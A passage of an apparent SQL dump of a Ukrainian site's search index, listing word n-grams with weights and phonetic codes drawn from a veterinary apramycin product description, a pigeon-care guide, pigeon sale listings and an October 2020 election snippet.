ягнят',0,1,1.4333,'п000',1,'*'),(1556663,'поросят ягнят кролів','поросят ягнят кролів',0,1,1.6667,'п000',1,'*'),(1556664,'поросята','поросята',0,0,0.5333,'п000',1,'*'),(1556665,'поросята вiком','поросята вiком',0,1,1.4667,'п000',1,'*'),(1556666,'поросята вiком до','поросята вiком до',0,1,1.5667,'п000',1,'*'),(1556667,'порошок білого','порошок білого',0,1,1.4667,'п000',1,'*'),(1556668,'порошок білого або','порошок білого або',0,1,1.6,'п000',1,'*'),(1556669,'порошок водорозчинний','порошок водорозчинний',0,1,1.7,'п000',1,'*'),(1556670,'порошок водорозчинний порошок','порошок водорозчинний порошок',0,1,1.9667,'п000',1,'*'),(1556671,'порошок для','порошок для',0,1,1.3667,'п000',1,'*'),(1556672,'порошок для перорального','порошок для перорального',0,1,1.8,'п000',1,'*'),(1556673,'препарат не','препарат не',0,1,1.3667,'п000',1,'*'),(1556674,'препарат не застосовувати','препарат не застосовувати',0,1,1.8333,'п000',1,'*'),(1556675,'препарат не метаболізується','препарат не метаболізується',0,1,1.9,'п000',1,'*'),(1556676,'препарати для','препарати для',0,1,1.4333,'п000',1,'*'),(1556677,'препарати для системного','препарати для системного',0,1,1.8,'п000',1,'*'),(1556678,'препаратом необхідно','препаратом необхідно',0,1,1.6667,'п000',1,'*'),(1556679,'препаратом необхідно використати','препаратом необхідно використати',0,1,2,'п000',1,'*'),(1556680,'препарату містить','препарату містить',0,1,1.5667,'п000',1,'*'),(1556681,'препарату містить діючу','препарату містить діючу',0,1,1.7667,'п000',1,'*'),(1556682,'препарату споживання','препарату споживання',0,1,1.6667,'п000',1,'*'),(1556683,'препарату споживання м\'яса','препарату споживання м',0,1,1.8667,'п000',1,'*'),(1556684,'при захворюваннях травного','при захворюваннях травного',0,1,1.8667,'п000',1,'*'),(1556685,'при пероральному','при пероральному',0,1,1.5333,'п000',1,'*'),(1556686,'при пероральному введенн1','при пероральному введенн1',0,1,1.8333,'п000',1,'*'),(1556687,'призначені','призначені',0,0,0.6667,'п000',1,'*'),(1556688,'призначені для','призначені для',0,1,1.4667,'п000',1,'*'),(1556689,'призначені для споживання','призначені для споживання',0,1,1.8333,'п000',1,'*'),(1556690,'протипоказання підвищена','протипоказання підвищена',0,1,1.8,'п000',1,'*'),(1556691,'протипоказання підвищена чутливість','протипоказання підвищена чутливість',0,1,2,'п000',1,'*'),(1556692,'протягом 3 діб','протягом 3 діб',0,1,1.4667,'п000',1,'*'),(1556693,'протягом 3 тижнів','протягом 3 тижнів',0,1,1.5667,'п000',1,'*'),(1556694,'протягом 3-5','протягом 3-5',0,1,1.4,'п000',1,'*'),(1556695,'протягом 3-5 д1б','протягом 3-5 д1б',0,1,1.5333,'п000',1,'*'),(1556696,'протягом 5 д1б','протягом 5 д1б',0,1,1.4667,'п000',1,'*'),(1556697,'протягом 5-8','протягом 5-8',0,1,1.4,'п000',1,'*'),(1556698,'протягом 5-8 діб','протягом 5-8 діб',0,1,1.5333,'п000',1,'*'),(1556699,'протягом 7','протягом 7',0,1,1.3333,'п000',1,'*'),(1556700,'протягом 7 д1б','протягом 7 д1б',0,1,1.4667,'п000',1,'*'),(1556701,'протягом 7 діб','протягом 7 діб',0,1,1.4667,'п000',1,'*'),(1556702,'птицi','птицi',0,0,0.3333,'п000',1,'*'),(1556703,'птицi хворо\'i','птицi хворо',0,1,1.4333,'п000',1,'*'),(1556704,'птицi хворо\'i на','птицi хворо на',0,1,1.5333,'п000',1,'*'),(1556705,'речовини кремнезем','речовини кремнезем',0,1,1.6,'р000',1,'*'),(1556706,'речовини кремнезем колоїдний','речовини кремнезем колоїдний',0,1,1.9333,'р000',1,'*'),(1556707,'речовини на','речовини на',0,1,1.3667,'р000',1,'*'),(1556708,'речовини на 1','речовини на 1',0,1,1.4333,'р000',1,'*'),(1556709,'речовину апраміцину','речовину апраміцину',0,1,1.6333,'р000',1,'*'),(1556710,'речовину апраміцину сульфат','речовину апраміцину сульфат',0,1,1.9,'р000',1,'*'),(1556711,'розчин 3','розчин 3',0,1,1.2667,'р000',1,'*'),(1556712,'розчин 3 препаратом','розчин 3 препаратом',0,1,1.6333,'р000',1,'*'),(1556713,'роки готовий','роки готовий',0,1,1.4,'р000',1,'*'),(1556714,'роки готовий розчин','роки готовий розчин',0,1,1.6333,'р000',1,'*'),(1556715,'с для','с для',0,1,1.1667,'с000',1,'*'),(1556716,'с для застосування','с для застосування',0,1,1.6,'с000',1,'*'),(1556717,'с до 25','с до 25',0,1,1.2333,'с000',1,'*'),(1556718,'с до 8','с до 8',0,1,1.2,'с000',1,'*'),(1556719,'сальмонельоз','сальмонельоз',0,0,0.8,'с000',1,'*'),(1556720,'сальмонельоз що','сальмонельоз що',0,1,1.5,'с000',1,'*'),(1556721,'сальмонельоз що спричинен1','сальмонельоз що спричинен1',0,1,1.8667,'с000',1,'*'),(1556722,'самый','самый',0,0,0.3333,'с000',1,'*'),(1556723,'самый современный','самый современный',0,1,1.5667,'с000',1,'*'),(1556724,'самый современный из','самый современный из',0,1,1.6667,'с000',1,'*'),(1556725,'септицем1ю','септицем1ю',0,0,0.6667,'с000',1,'*'),(1556726,'септицем1ю що','септицем1ю що',0,1,1.4333,'с000',1,'*'),(1556727,'септицем1ю що спричинена','септицем1ю що спричинена',0,1,1.8,'с000',1,'*'),(1556728,'сечею','сечею',0,0,0.3333,'с000',1,'*'),(1556729,'сечею застосування','сечею застосування',0,1,1.6,'с000',1,'*'),(1556730,'сечею застосування телята','сечею застосування телята',0,1,1.8333,'с000',1,'*'),(1556731,'синтезу бактеріальної','синтезу бактеріальної',0,1,1.7,'с000',1,'*'),(1556732,'синтезу бактеріальної клітини','синтезу бактеріальної клітини',0,1,1.9667,'с000',1,'*'),(1556733,'системного застосування qj01gb90','системного застосування qj01gb90',0,1,2,'с210',1,'*'),(1556734,'систему','систему',0,0,0.4667,'с000',2,'*'),(1556735,'систему поїння','систему поїння',0,1,1.4667,'с000',1,'*'),(1556736,'систему поїння необхідно','систему поїння необхідно',0,1,1.8,'с000',1,'*'),(1556737,'современный','современный',0,0,0.7333,'с000',1,'*'),(1556738,'современный из','современный из',0,1,1.4667,'с000',1,'*'),(1556739,'современный из антибиотиков','современный из антибиотиков',0,1,1.9,'с000',1,'*'),(1556740,'спектр действия','спектр действия',0,1,1.5,'с000',1,'*'),(1556741,'спектр действия высокая','спектр действия высокая',0,1,1.7667,'с000',1,'*'),(1556742,'споживання','споживання',0,0,0.6667,'с000',3,'*'),(1556743,'споживання людьми','споживання людьми',0,1,1.5667,'с000',1,'*'),(1556744,'споживання людьми препарат','споживання людьми препарат',0,1,1.8667,'с000',1,'*'),(1556745,'споживання м\'яса','споживання м',0,1,1.5333,'с000',1,'*'),(1556746,'споживання м\'яса поросят','споживання м поросят',0,1,1.8,'с000',1,'*'),(1556747,'спричинен1','спричинен1',0,0,0.6667,'с000',1,'*'),(1556748,'спричинен1 мiкроорган1змами','спричинен1 мiкроорган1змами',0,1,1.9,'с000',1,'*'),(1556749,'спричинен1 мiкроорган1змами чутливими','спричинен1 мiкроорган1змами чутливими',0,1,2,'с000',1,'*'),(1556750,'спричинена','спричинена',0,0,0.6667,'с000',1,'*'),(1556751,'спричинена мiкроорган1змами','спричинена мiкроорган1змами',0,1,1.9,'с000',1,'*'),(1556752,'спричинена мiкроорган1змами чутливими','спричинена мiкроорган1змами чутливими',0,1,2,'с000',1,'*'),(1556753,'спричинений','спричинений',0,0,0.7333,'с000',1,'*'),(1556754,'спричинений мiкроорган1змами','спричинений мiкроорган1змами',0,1,1.9333,'с000',1,'*'),(1556755,'спричинений мiкроорган1змами чутливими','спричинений мiкроорган1змами чутливими',0,1,2,'с000',1,'*'),(1556756,'становить','становить',0,0,0.6,'с000',1,'*'),(1556757,'становить 10-15','становить 10-15',0,1,1.5,'с000',1,'*'),(1556758,'становить 10-15 мг','становить 10-15 мг',0,1,1.6,'с000',1,'*'),(1556759,'становить 25-50','становить 25-50',0,1,1.5,'с000',1,'*'),(1556760,'становить 25-50 мг','становить 25-50 мг',0,1,1.6,'с000',1,'*'),(1556761,'становить 5-10','становить 5-10',0,1,1.4667,'с000',1,'*'),(1556762,'становить 5-10 мг','становить 5-10 мг',0,1,1.5667,'с000',1,'*'),(1556763,'становить 7,5-12,5','становить 7,5-12,5',0,1,1.6,'с000',1,'*'),(1556764,'становить 7,5-12,5 мг','становить 7,5-12,5 мг',0,1,1.7,'с000',1,'*'),(1556765,'створюе','створюе',0,0,0.4667,'с000',1,'*'),(1556766,'створюе високi','створюе високi',0,1,1.4667,'с000',1,'*'),(1556767,'створюе високi антибактер1альн1','створюе високi антибактер1альн1',0,1,2,'с000',1,'*'),(1556768,'сульфат','сульфат',0,0,0.4667,'с000',1,'*'),(1556769,'сульфат в','сульфат в',0,1,1.3,'с000',1,'*'),(1556770,'сульфат в перерахунку','сульфат в перерахунку',0,1,1.7,'с000',1,'*'),(1556771,'тiла','тiла',0,0,0.2667,'т000',1,'*'),(1556772,'тiла 10-20','тiла 10-20',0,1,1.3333,'т000',1,'*'),(1556773,'тiла 10-20 мг','тiла 10-20 мг',0,1,1.4333,'т000',1,'*'),(1556774,'тiла 20-40','тiла 20-40',0,1,1.3333,'т000',1,'*'),(1556775,'тiла 20-40 мг','тiла 20-40 мг',0,1,1.4333,'т000',1,'*'),(1556776,'тiла 250-500','тiла 250-500',0,1,1.4,'т000',1,'*'),(1556777,'тiла 250-500 мг','тiла 250-500 мг',0,1,1.5,'т000',1,'*'),(1556778,'тiла щодобово','тiла щодобово',0,1,1.4333,'т000',1,'*'),(1556779,'тiла щодобово протягом','тiла щодобово протягом',0,1,1.7333,'т000',1,'*'),(1556780,'тіла','тіла',0,0,0.2667,'т000',1,'*'),(1556781,'тіла 250-500','тіла 250-500',0,1,1.4,'т000',1,'*'),(1556782,'тіла 250-500 мг','тіла 250-500 мг',0,1,1.5,'т000',1,'*'),(1556783,'тіла 50-100','тіла 50-100',0,1,1.3667,'т000',1,'*'),(1556784,'тіла 50-100 мг','тіла 50-100 мг',0,1,1.4667,'т000',1,'*'),(1556785,'та курчат','та курчат',0,1,1.3,'т000',1,'*'),(1556786,'та курчат дозволяють','та курчат дозволяють',0,1,1.6667,'т000',1,'*'),(1556787,'та лактації','та лактації',0,1,1.3667,'т000',1,'*'),(1556788,'та лактації застереження','та лактації застереження',0,1,1.8,'т000',1,'*'),(1556789,'та мікоплазми','та мікоплазми',0,1,1.4333,'т000',1,'*'),(1556790,'та мікоплазми мусоplasma','та мікоплазми мусоplasma',0,1,1.8,'т1425',1,'*'),(1556791,'тварин на','тварин на',0,1,1.3,'т000',1,'*'),(1556792,'тварин на м\'ясо','тварин на м',0,1,1.5,'т000',1,'*'),(1556793,'тварин при','тварин при',0,1,1.3333,'т000',1,'*'),(1556794,'тварин при захворюваннях','тварин при захворюваннях',0,1,1.8,'т000',1,'*'),(1556795,'тварин хворих','тварин хворих',0,1,1.4333,'т000',1,'*'),(1556796,'тварин хворих на','тварин хворих на',0,1,1.5333,'т000',1,'*'),(1556797,'тваринам залежно','тваринам залежно',0,1,1.5333,'т000',1,'*'),(1556798,'тваринам залежно від','тваринам залежно від',0,1,1.6667,'т000',1,'*'),(1556799,'тваринам у','тваринам у',0,1,1.3333,'т000',1,'*'),(1556800,'тваринам у період','тваринам у період',0,1,1.5667,'т000',1,'*'),(1556801,'телята','телята',0,0,0.4,'т000',1,'*'),(1556802,'телята вiком','телята вiком',0,1,1.4,'т000',1,'*'),(1556803,'телята вiком до','телята вiком до',0,1,1.5,'т000',1,'*'),(1556804,'телята після','телята після',0,1,1.4,'т000',1,'*'),(1556805,'телята після останнього','телята після останнього',0,1,1.7667,'т000',1,'*'),(1556806,'темному','темному',0,0,0.4667,'т000',1,'*'),(1556807,'темному місці','темному місці',0,1,1.4333,'т000',1,'*'),(1556808,'темному місці при','темному місці при',0,1,1.5667,'т000',1,'*'),(1556809,'температурі від 2','температурі від 2',0,1,1.5667,'т000',1,'*'),(1556810,'температурі від 5','температурі від 5',0,1,1.5667,'т000',1,'*'),(1556811,'терміну','терміну',0,0,0.4667,'т000',1,'*'),(1556812,'терміну м\'ясо','терміну м',0,1,1.4333,'т000',1,'*'),(1556813,'терміну м\'ясо утилізують','терміну м утилізують',0,1,1.8,'т000',1,'*'),(1556814,'тижнів курчата','тижнів курчата',0,1,1.4667,'т000',1,'*'),(1556815,'тижнів курчата кури-бройлери','тижнів курчата кури-бройлери',0,1,1.9333,'т000',1,'*'),(1556816,'типу','типу',0,0,0.2667,'т000',1,'*'),(1556817,'типу «кришка','типу «кришка',0,1,1.4,'т000',1,'*'),(1556818,'типу «кришка у','типу «кришка у',0,1,1.4667,'т000',1,'*'),(1556819,'токсичністю','токсичністю',0,0,0.7333,'т000',1,'*'),(1556820,'токсичністю виводиться','токсичністю виводиться',0,1,1.7333,'т000',1,'*'),(1556821,'токсичністю виводиться з','токсичністю виводиться з',0,1,1.8,'т000',1,'*'),(1556822,'травного','травного',0,0,0.5333,'т000',1,'*'),(1556823,'травного каналу','травного каналу',0,1,1.5,'т000',1,'*'),(1556824,'травного каналу що','травного каналу що',0,1,1.6,'т000',1,'*'),(1556825,'травному','травному',0,0,0.5333,'т000',1,'*'),(1556826,'травному канам','травному канам',0,1,1.4667,'т000',1,'*'),(1556827,'травному канам препарат','травному канам препарат',0,1,1.7667,'т000',1,'*'),(1556828,'ться','ться',0,0,0.2667,'т000',1,'*'),(1556829,'ться 1','ться 1',0,1,1.2,'т000',1,'*'),(1556830,'ться 1 створюе','ться 1 створюе',0,1,1.4667,'т000',1,'*'),(1556831,'у гальмуванні','у гальмуванні',0,1,1.4333,'у000',1,'*'),(1556832,'у гальмуванні білкового','у гальмуванні білкового',0,1,1.7667,'у000',1,'*'),(1556833,'у дозах телята','у дозах телята',0,1,1.4667,'у000',1,'*'),(1556834,'у зв\'язку','у зв',0,1,1.3,'у000',2,'*'),(1556835,'у зв\'язку зі','у зв зі',0,1,1.4,'у000',1,'*'),(1556836,'у кришці»','у кришці»',0,1,1.3,'у000',1,'*'),(1556837,'у кришці» 13','у кришці» 13',0,1,1.4,'у000',1,'*'),(1556838,'у період','у період',0,1,1.2667,'у000',1,'*'),(1556839,'у період вагітності','у період вагітності',0,1,1.6333,'у000',1,'*'),(1556840,'у темному','у темному',0,1,1.3,'у000',1,'*'),(1556841,'у темному місці','у темному місці',0,1,1.5,'у000',1,'*'),(1556842,'у травному','у травному',0,1,1.3333,'у000',1,'*'),(1556843,'у травному канам','у травному канам',0,1,1.5333,'у000',1,'*'),(1556844,'умови','умови',0,0,0.3333,'у000',1,'*'),(1556845,'умови зберігання','умови зберігання',0,1,1.5333,'у000',1,'*'),(1556846,'умови зберігання його','умови зберігання його',0,1,1.7,'у000',1,'*'),(1556847,'утилізують','утилізують',0,0,0.6667,'у000',1,'*'),(1556848,'утилізують або','утилізують або',0,1,1.4667,'у000',1,'*'),(1556849,'утилізують або згодовують','утилізують або згодовують',0,1,1.8333,'у000',1,'*'),(1556850,'фармакологічні властивості атс','фармакологічні властивості атс',0,1,2,'ф000',1,'*'),(1556851,'фекаліями','фекаліями',0,0,0.6,'ф000',1,'*'),(1556852,'фекаліями і','фекаліями і',0,1,1.3667,'ф000',1,'*'),(1556853,'фекаліями і частково','фекаліями і частково',0,1,1.6667,'ф000',1,'*'),(1556854,'характеризується','характеризується',0,0,1,'х000',1,'*'),(1556855,'характеризується бактерицидною','характеризується бактерицидною',0,1,2,'х000',1,'*'),(1556856,'характеризується бактерицидною дією','характеризується бактерицидною дією',0,1,2,'х000',1,'*'),(1556857,'характеризуєтьсянизькою','характеризуєтьсянизькою',0,0,1,'х000',1,'*'),(1556858,'характеризуєтьсянизькою токсичністю','характеризуєтьсянизькою токсичністю',0,1,2,'х000',1,'*'),(1556859,'характеризуєтьсянизькою токсичністю виводиться','характеризуєтьсянизькою токсичністю виводиться',0,1,2,'х000',1,'*'),(1556860,'хворих','хворих',0,0,0.4,'х000',1,'*'),(1556861,'хворих на','хворих на',0,1,1.3,'х000',1,'*'),(1556862,'хворих на ентерити','хворих на ентерити',0,1,1.6,'х000',1,'*'),(1556863,'хворих на колiбактер1оз','хворих на колiбактер1оз',0,1,1.7667,'х000',1,'*'),(1556864,'хворо\'i','хворо',0,0,0.4667,'х000',1,'*'),(1556865,'хворо\'i на','хворо на',0,1,1.3333,'х000',1,'*'),(1556866,'хворо\'i на септицем1ю','хворо на септицем1ю',0,1,1.7,'х000',1,'*'),(1556867,'це','це',0,0,0.1333,'ц000',6,'*'),(1556868,'це аміноглікозидний','це аміноглікозидний',0,1,1.6333,'ц000',1,'*'),(1556869,'це аміноглікозидний антибіотик','це аміноглікозидний антибіотик',0,1,2,'ц000',1,'*'),(1556870,'частково','частково',0,0,0.5333,'ч000',3,'*'),(1556871,'частково з','частково з',0,1,1.3333,'ч000',1,'*'),(1556872,'частково з сечею','частково з сечею',0,1,1.5333,'ч000',1,'*'),(1556873,'через 28','через 28',0,1,1.2667,'ч000',1,'*'),(1556874,'через 28 діб','через 28 діб',0,1,1.4,'ч000',1,'*'),(1556875,'чином','чином',0,0,0.3333,'ч000',3,'*'),(1556876,'чином з','чином з',0,1,1.2333,'ч000',1,'*'),(1556877,'чином з фекаліями','чином з фекаліями',0,1,1.5667,'ч000',1,'*'),(1556878,'чутливість до апраміцину','чутливість до апраміцину',0,1,1.8,'ч000',1,'*'),(1556879,'чутливими до апрам1цину','чутливими до апрам1цину',0,1,1.7667,'ч000',1,'*'),(1556880,'широчайший','широчайший',0,0,0.6667,'ш000',1,'*'),(1556881,'широчайший спектр','широчайший спектр',0,1,1.5667,'ш000',1,'*'),(1556882,'широчайший спектр действия','широчайший спектр действия',0,1,1.8667,'ш000',1,'*'),(1556883,'щільності','щільності',0,0,0.6,'щ000',1,'*'),(1556884,'щільності зберігання','щільності зберігання',0,1,1.6667,'щ000',1,'*'),(1556885,'щільності зберігання сухе','щільності зберігання сухе',0,1,1.8333,'щ000',1,'*'),(1556886,'що спричинен1','що спричинен1',0,1,1.4333,'щ000',1,'*'),(1556887,'що спричинен1 мiкроорган1змами','що спричинен1 мiкроорган1змами',0,1,2,'щ000',1,'*'),(1556888,'що спричинена','що спричинена',0,1,1.4333,'щ000',1,'*'),(1556889,'що спричинена мiкроорган1змами','що спричинена мiкроорган1змами',0,1,2,'щ000',1,'*'),(1556890,'що спричинений','що спричинений',0,1,1.4667,'щ000',1,'*'),(1556891,'що спричинений мiкроорган1змами','що спричинений мiкроорган1змами',0,1,2,'щ000',1,'*'),(1556892,'що становить','що становить',0,1,1.4,'щ000',1,'*'),(1556893,'що становить 10-15','що становить 10-15',0,1,1.6,'щ000',1,'*'),(1556894,'що становить 25-50','що становить 25-50',0,1,1.6,'щ000',1,'*'),(1556895,'що становить 5-10','що становить 5-10',0,1,1.5667,'щ000',1,'*'),(1556896,'що становить 7,5-12,5','що становить 7,5-12,5',0,1,1.7,'щ000',1,'*'),(1556897,'що характеризується','що характеризується',0,1,1.6333,'щ000',1,'*'),(1556898,'що характеризується бактерицидною','що характеризується бактерицидною',0,1,2,'щ000',1,'*'),(1556899,'щодобово','щодобово',0,0,0.5333,'щ000',1,'*'),(1556900,'щодобово протягом','щодобово протягом',0,1,1.5667,'щ000',1,'*'),(1556901,'щодобово протягом 3','щодобово протягом 3',0,1,1.6333,'щ000',1,'*'),(1556902,'щодобово протягом 3-5','щодобово протягом 3-5',0,1,1.7,'щ000',1,'*'),(1556903,'щодобово протягом 5','щодобово протягом 5',0,1,1.6333,'щ000',1,'*'),(1556904,'щодобово протягом 5-8','щодобово протягом 5-8',0,1,1.7,'щ000',1,'*'),(1556905,'щодобово протягом 7','щодобово протягом 7',0,1,1.6333,'щ000',1,'*'),(1556906,'эффективность','эффективность',0,0,0.8667,'э000',1,'*'),(1556907,'эффективность и','эффективность и',0,1,1.5,'э000',1,'*'),(1556908,'эффективность и надежность','эффективность и надежность',0,1,1.8667,'э000',1,'*'),(1556909,'ягнят','ягнят',0,0,0.3333,'я000',1,'*'),(1556910,'ягнят кролів','ягнят кролів',0,1,1.4,'я000',1,'*'),(1556911,'ягнят кролів та','ягнят кролів та',0,1,1.5,'я000',1,'*'),(1556912,'ягнята','ягнята',0,0,0.4,'я000',1,'*'),(1556913,'ягнята вiком','ягнята вiком',0,1,1.4,'я000',1,'*'),(1556914,'ягнята вiком до','ягнята вiком до',0,1,1.5,'я000',1,'*'),(1556915,'яйця','яйця',0,0,0.2667,'я000',1,'*'),(1556916,'яйця яких','яйця яких',0,1,1.3,'я000',1,'*'),(1556917,'яйця яких призначені','яйця яких призначені',0,1,1.6667,'я000',1,'*'),(1556918,'яка','яка',0,0,0.2,'я000',1,'*'),(1556919,'яка полягає','яка полягає',0,1,1.3667,'я000',1,'*'),(1556920,'яка полягає у','яка полягає у',0,1,1.4333,'я000',1,'*'),(1556921,'яких','яких',0,0,0.2667,'я000',2,'*'),(1556922,'яких призначені','яких призначені',0,1,1.5,'я000',1,'*'),(1556923,'яких призначені для','яких призначені для',0,1,1.6333,'я000',1,'*'),(1558492,'2465','2465',0,0,0.4,'',1,'*'),(1558493,'infektsijnikh','infektsijnikh',0,0,0.8667,'I5123252',1,'*'),(1558494,'infektsijnikh zakhvoryuvan','infektsijnikh zakhvoryuvan',0,1,1.8667,'I51232521615',1,'*'),(1558495,'infektsijnikh zakhvoryuvan v','infektsijnikh zakhvoryuvan v',0,1,1.9333,'I512325216151',1,'*'),(1558496,'likuvannya','likuvannya',0,0,0.6667,'L215',1,'*'),(1558497,'likuvannya ta','likuvannya ta',0,1,1.4333,'L2153',1,'*'),(1558498,'likuvannya ta profilaktika','likuvannya ta profilaktika',0,1,1.8667,'L21531614232',1,'*'),(1558499,'profilaktika','profilaktika',0,0,0.8,'P614232',1,'*'),(1558500,'profilaktika infektsijnikh','profilaktika infektsijnikh',0,1,1.8667,'P6142325123252',1,'*'),(1558501,'profilaktika infektsijnikh zakhvoryuvan','profilaktika infektsijnikh zakhvoryuvan',0,1,2,'P61423251232521615',1,'*'),(1558502,'ta profilaktika','ta profilaktika',0,1,1.5,'T1614232',1,'*'),(1558503,'ta profilaktika infektsijnikh','ta profilaktika infektsijnikh',0,1,1.9667,'T16142325123252',1,'*'),(1558504,'v golubiv','v golubiv',0,1,1.3,'V241',1,'*'),(1558505,'zakhvoryuvan','zakhvoryuvan',0,0,0.8,'Z1615',1,'*'),(1558506,'zakhvoryuvan v','zakhvoryuvan v',0,1,1.4667,'Z16151',1,'*'),(1558507,'zakhvoryuvan v golubiv','zakhvoryuvan v golubiv',0,1,1.7333,'Z16151241',1,'*'),(1558508,'інфекційних','інфекційних',0,0,0.7333,'і000',1,'*'),(1558509,'інфекційних захворювань','інфекційних захворювань',0,1,1.7667,'і000',1,'*'),(1558510,'інфекційних захворювань в','інфекційних захворювань в',0,1,1.8333,'і000',1,'*'),(1558511,'від геннадія','від геннадія',0,1,1.4,'в000',1,'*'),(1558512,'від геннадія лозка','від геннадія лозка',0,1,1.6,'в000',1,'*'),(1558513,'геннадія','геннадія',0,0,0.5333,'г000',1,'*'),(1558514,'геннадія лозка','геннадія лозка',0,1,1.4667,'г000',1,'*'),(1558515,'геннадія лозка особливо','геннадія лозка особливо',0,1,1.7667,'г000',1,'*'),(1558516,'для початківців','для початківців',0,1,1.5,'д000',1,'*'),(1558517,'думку','думку',0,0,0.3333,'д000',1,'*'),(1558518,'думку кращий','думку кращий',0,1,1.4,'д000',1,'*'),(1558519,'думку кращий лікнеп','думку кращий лікнеп',0,1,1.6333,'д000',1,'*'),(1558520,'захворювань','захворювань',0,0,0.7333,'з000',1,'*'),(1558521,'захворювань в','захворювань в',0,1,1.4333,'з000',1,'*'),(1558522,'захворювань в голубів','захворювань в голубів',0,1,1.7,'з000',1,'*'),(1558523,'кращий','кращий',0,0,0.4,'к000',1,'*'),(1558524,'кращий лікнеп','кращий лікнеп',0,1,1.4333,'к000',1,'*'),(1558525,'кращий лікнеп від','кращий лікнеп від',0,1,1.5667,'к000',1,'*'),(1558526,'лікнеп','лікнеп',0,0,0.4,'л000',1,'*'),(1558527,'лікнеп від','лікнеп від',0,1,1.3333,'л000',1,'*'),(1558528,'лікнеп від геннадія','лікнеп від геннадія',0,1,1.6333,'л000',1,'*'),(1558529,'лікування та','лікування та',0,1,1.4,'л000',1,'*'),(1558530,'лікування та профілактика','лікування та профілактика',0,1,1.8333,'л000',1,'*'),(1558531,'лозка','лозка',0,0,0.3333,'л000',1,'*'),(1558532,'лозка особливо','лозка особливо',0,1,1.4667,'л000',1,'*'),(1558533,'лозка особливо для','лозка особливо для',0,1,1.6,'л000',1,'*'),(1558534,'мою','мою',0,0,0.2,'м000',1,'*'),(1558535,'мою думку','мою думку',0,1,1.3,'м000',1,'*'),(1558536,'мою думку кращий','мою думку кращий',0,1,1.5333,'м000',1,'*'),(1558537,'на мою','на мою',0,1,1.2,'н000',1,'*'),(1558538,'на мою думку','на мою думку',0,1,1.4,'н000',1,'*'),(1558539,'особливо','особливо',0,0,0.5333,'о000',1,'*'),(1558540,'особливо для','особливо для',0,1,1.4,'о000',1,'*'),(1558541,'особливо для початківців','особливо для початківців',0,1,1.8,'о000',1,'*'),(1558542,'початківців','початківців',0,0,0.7333,'п000',1,'*'),(1558543,'профілактика інфекційних','профілактика інфекційних',0,1,1.8,'п000',1,'*'),(1558544,'профілактика інфекційних захворювань','профілактика інфекційних захворювань',0,1,2,'п000',1,'*'),(1558545,'та профілактика','та профілактика',0,1,1.5,'т000',1,'*'),(1558546,'та профілактика інфекційних','та профілактика інфекційних',0,1,1.9,'т000',1,'*'),(1558999,'2020 року є','2020 року є',0,1,1.3667,'р000',2,'*'),(1559003,'foto fotohalereia','foto fotohalereia',0,1,1.5667,'F31346',2,'*'),(1559010,'https malehus','https malehus',0,1,1.4333,'H312542',2,'*'),(1559011,'https malehus in','https malehus in',0,1,1.5333,'H3125425',2,'*'),(1559012,'in','in',0,0,0.1333,'I500',2,'*'),(1559013,'in ua','in ua',0,1,1.1667,'I500',2,'*'),(1559014,'in ua index','in ua index',0,1,1.3667,'I532',2,'*'),(1559015,'index php','index php',0,1,1.3,'I5321',2,'*'),(1559016,'index php foto','index php foto',0,1,1.4667,'I53213',2,'*'),(1559017,'malehus in','malehus in',0,1,1.3333,'M425',2,'*'),(1559018,'malehus in ua','malehus in ua',0,1,1.4333,'M425',2,'*'),(1559019,'molodi','molodi',0,0,0.4,'M430',5,'*'),(1559020,'molodi poshtovi','molodi poshtovi',0,1,1.5,'M431231',4,'*'),(1559022,'php','php',0,0,0.2,'P000',2,'*'),(1559023,'php foto','php foto',0,1,1.2667,'P300',2,'*'),(1559024,'php foto fotohalereia','php foto fotohalereia',0,1,1.7,'P31346',2,'*'),(1559025,'poshtovi','poshtovi',0,0,0.5333,'P231',11,'*'),(1559031,'ua','ua',0,0,0.1333,'U000',9,'*'),(1559032,'ua index','ua index',0,1,1.2667,'U532',2,'*'),(1559033,'ua index php','ua index php',0,1,1.4,'U5321',2,'*'),(1559036,'голубів можна','голубів можна',0,1,1.4333,'г000',2,'*'),(1559037,'голубів можна переглянути','голубів можна переглянути',0,1,1.8333,'г000',2,'*'),(1559042,'домовимось фото','домовимось фото',0,1,1.5,'д000',2,'*'),(1559043,'домовимось фото голубів','домовимось фото голубів',0,1,1.7667,'д000',2,'*'),(1559044,'за посиланням https','за посиланням https',0,1,1.6333,'з312',4,'*'),(1559045,'можна переглянути','можна переглянути',0,1,1.5667,'м000',4,'*'),(1559046,'можна переглянути за','можна переглянути за',0,1,1.6667,'м000',2,'*'),(1559047,'молоді','молоді',0,0,0.4,'м000',5,'*'),(1559048,'молоді поштові','молоді поштові',0,1,1.4667,'м000',4,'*'),(1559056,'переглянути','переглянути',0,0,0.7333,'п000',5,'*'),(1559057,'переглянути за','переглянути за',0,1,1.4667,'п000',2,'*'),(1559058,'переглянути за посиланням','переглянути за посиланням',0,1,1.8333,'п000',2,'*'),(1559059,'посиланням https','посиланням https',0,1,1.5333,'п312',4,'*'),(1559060,'посиланням https malehus','посиланням https malehus',0,1,1.8,'п312542',2,'*'),(1559061,'поштові','поштові',0,0,0.4667,'п000',9,'*'),(1559066,'телефонуйте домовимось фото','телефонуйте домовимось фото',0,1,1.9,'т000',1,'*'),(1559067,'фото голубів','фото голубів',0,1,1.4,'ф000',2,'*'),(1559068,'фото голубів можна','фото голубів можна',0,1,1.6,'ф000',2,'*'),(1559069,'ціна','ціна',0,0,0.2667,'ц000',6,'*'),(1560554,'2020 roku za','2020 roku za',0,1,1.4,'R200',1,'*'),(1560555,'2020 року за','2020 року за',0,1,1.4,'р000',1,'*'),(1560556,'2468','2468',0,0,0.4,'',1,'*'),(1560557,'25 zhovtnya','25 zhovtnya',0,1,1.3667,'Z135',1,'*'),(1560558,'25 zhovtnya 2020','25 zhovtnya 2020',0,1,1.5333,'Z135',1,'*'),(1560559,'25 жовтня','25 жовтня',0,1,1.3,'ж000',1,'*'),(1560560,'25 жовтня 2020','25 жовтня 2020',0,1,1.4667,'ж000',1,'*'),(1560561,'danimi','danimi',0,0,0.4,'D500',1,'*'),(1560562,'danimi tsvk','danimi tsvk',0,1,1.3667,'D53212',1,'*'),(1560563,'deputativ','deputativ',0,0,0.6,'D131',1,'*'),(1560564,'deputativ miskoji','deputativ miskoji',0,1,1.5667,'D13152',1,'*'),(1560565,'deputativ miskoji silskoji','deputativ miskoji silskoji',0,1,1.8667,'D1315242',1,'*'),(1560566,'golosu','golosu',0,0,0.4,'G420',1,'*'),(1560567,'golosu na','golosu na',0,1,1.3,'G425',1,'*'),(1560568,'golosu na viborakh','golosu na 